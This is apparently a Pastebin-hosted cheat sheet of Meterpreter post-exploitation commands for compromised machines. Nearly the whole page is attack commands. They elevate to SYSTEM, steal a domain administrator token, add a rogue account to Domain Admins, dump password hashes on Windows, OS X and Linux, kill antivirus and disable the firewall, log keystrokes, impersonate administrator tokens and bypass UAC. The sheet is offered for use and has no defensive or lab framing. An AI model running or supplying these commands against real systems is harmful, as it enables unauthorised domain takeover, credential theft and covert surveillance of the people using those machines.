Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Elevate your permissions on Windows-based systems using Meterpreter:
- meterpreter > use priv
- meterpreter > getsystem
- Steal a domain administrator token from a given process ID, add a
- domain account, and then add it to the Domain Admins group:
- meterpreter > ps
- meterpreter > steal_token 1784
- meterpreter > shell
- C:\Windows\system32>net user metasploit p@55w0rd /ADD /DOMAIN
- C:\Windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN
- Dump password hashes from the SAM database:
- meterpreter > use priv
- meterpreter > getsystem
- meterpreter > hashdump
- NOTE On Win2k8 you may need to migrate to a process that is running as SYSTEM if
- getsystem and hashdump throw exceptions.
- Automigrate to a separate process:
- meterpreter > run migrate
- Kill antivirus processes running on the target via the killav Meterpreter
- script:
- meterpreter > run killav
- Capture keystrokes on target machines from within a particular process:
- meterpreter > ps
- meterpreter > migrate 1436
- meterpreter > keyscan_start
- meterpreter > keyscan_dump
- meterpreter > keyscan_stop
- Use Incognito to impersonate an administrator:
- meterpreter > use incognito
- meterpreter > list_tokens -u
- meterpreter > use priv
- meterpreter > getsystem
- meterpreter > list_tokens -u
- meterpreter > impersonate_token IHAZSECURITY\\Administrator
- See what protection mechanisms are in place on the compromised
- target, display the help menu, disable Windows Firewall, and kill all countermeasures
- found:
- meterpreter > run getcountermeasure
- meterpreter > run getcountermeasure -h
- meterpreter > run getcountermeasure -d -k
- Identify whether the compromised system is a virtual machine:
- meterpreter > run checkvm
- Drop into a command shell for a current Meterpreter console session:
- meterpreter > shell
- Get a remote GUI (VNC) on the target machine:
- meterpreter > run vnc
- Background a currently running Meterpreter console:
- meterpreter > background
- Bypass Windows User Access Control:
- meterpreter > run post/windows/escalate/bypassuac
- Dump Hashes on an OS X system:
- meterpreter > run post/osx/gather/hashdump
- Dump Hashes on a Linux system:
- meterpreter > run post/linux/gather/hashdump
Advertisement
Add Comment
Please, Sign In to add comment